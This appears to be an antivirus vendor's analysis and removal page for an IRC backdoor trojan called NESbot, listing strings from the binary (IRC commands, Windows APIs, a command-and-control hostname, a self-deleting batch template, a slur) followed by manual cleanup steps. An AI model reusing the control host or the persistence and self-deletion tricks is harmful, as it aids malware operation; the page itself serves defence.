USER NESv5 * 0 :%s
QUIT %s
JOIN
PRIVMSG
NICK
PONG %s
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
MODE %s %s
MODE %s %s %s
Torrent 1.8.1
%d.%d.%d.%d
kernel32.dll
user32.dll
advapi32.dll
RegEnumKeyExA
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
FtpGetFileA
FtpPutFileA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
netapi32.dll
dnsapi.dll
iphlpapi.dll
GetTcpTable
GetUdpTable
mpr.dll
shell32.dll
ShellExecuteA
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
userenv.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
%s%%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
winsvc32.exe
DataBlock.exe
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
192.168.11.128


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Cyanide.exe:348
    Cyanide.exe:1972
    winsvc32.exe:344
    Ganja145.exe:1436
    NESbot.exe:612
    NESbot.exe:1388

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)
    %Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)
    %WinDir%\winsvc32.exe (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "winsvc32" = "winsvc32.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
